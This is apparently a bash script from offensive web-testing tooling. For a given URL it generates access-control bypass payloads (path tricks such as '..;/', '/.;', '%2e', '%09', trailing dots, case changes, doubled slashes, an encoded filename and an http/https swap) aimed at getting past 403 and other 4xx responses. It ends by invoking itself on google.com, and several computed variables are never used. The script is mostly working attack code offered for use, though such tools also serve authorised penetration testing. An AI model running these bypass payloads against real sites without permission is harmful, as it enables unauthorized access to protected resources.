#!/bin/bash

function headers (){
	url=$1
	echo "Doing $url"
conlen=$(echo "$url" | httpx -silent -content-length -no-color | awk '{print $2}' | grep -Po "[0-9]+")
base=$(echo "$(echo "$url" | cut -d/ -f1,2,3)")
path=$(echo "/$(echo "$url" | cut -d/ -f4-)") #| sed 's/\/$//g')
ips=$(dig "$(echo "$base" | cut -d/ -f 3)" +short)
payloads=("$url")
filename=$(echo $url | grep -oP "[^/]+/?$" | grep -Po "^[^/]+")
fileurlenc=$(printf $filename | od -An -tx1 -v -w | tr ' ' % | sed 's/%0a//g')
filename1st=$(printf $url | grep -oP "[^/]+/?$" | grep -oP ^.)
fileurlenc1st=$(printf $filename1st | grep -oP "[^/]+/?$" | grep -oP ^. | od -An -tx1 -v -w | tr ' ' % | sed 's/%0a//g')

# only the base
#payloads+=($base)

if [[ "$path" =~ "/"$ ]]
then
        payloads+=("$base$(echo $path | awk '{print $0"."}')")
        payloads+=("$base$(echo $path | awk '{print $0"./"}')")
        payloads+=("$base$(echo $path | awk '{print $0"*"}')")
        payloads+=("$base$(echo $path | sed 's/\/$/;\//g')")
        payloads+=("$base$(echo $path | awk '{print $0"%20"}')")
        payloads+=("$base$(echo $path | awk '{print $0"%2e"}')")
        payloads+=("$base$(echo $path | awk '{print $0"~"}')")
        payloads+=("$base$(echo $path | awk '{print $0"%09"}')")
else
        payloads+=("$base$(echo $path | awk '{print $0"/."}')")
        payloads+=("$base$(echo $path | awk '{print $0"..;/"}')")
        payloads+=("$base$(echo $path | awk '{print $0";/"}')")
        payloads+=("$base$(echo $path | awk '{print $0"/%2e"}')")
        payloads+=("$base$(echo $path | awk '{print $0"/~"}')")
        payloads+=("$base$(echo $path | awk '{print $0"/%09"}')")
        payloads+=("$base$(echo $path | awk '{print $0"/.json"}')")
fi

payloads+=("$base$(echo $path | sed "s/$filename/$fileurlenc/g")")
payloads+=("$base$(echo $path | awk '{print $0".json"}')")
#payloads+=($(echo $ips | grep -oP "[0-9]{2,}\.[0-9]{2,}\.[0-9]{2,}\.[0-9]{2,}" | httpx  | awk -v var=$path '{print $0var}'))
payloads+=("$base$(echo "/.;$path")")
payloads+=("$base$(echo $path | awk '{print $0"#"}')")
payloads+=("$base$(echo $path | awk '{print $0"?gg"}')")
payloads+=("$base$(echo $path | sed 's/\//\/%20\//g')")
payloads+=("$base$(echo $path | sed 's/\//\/%2e\//g')")
payloads+=("$base$(echo $path | awk '{print toupper($0)}')")
payloads+=("$base$(echo $path | sed 's#/#/./#1')")
payloads+=("$base$(echo $path | sed 's/\//\/\//g')")

if [ $(echo "$url" | grep https | wc -l) -gt 0 ]; then
        payloads+=("$(echo $url | sed 's/https/http/g')")
else
        payloads+=("$(echo $url | sed 's/http/https/g')")
fi

echo ${payloads[*]} | tr ' ' '\n' > 4xxpayloads

cat 4xxpayloads |xargs -n 1

rm 4xxpayloads 


}

 headers "https://google.com"
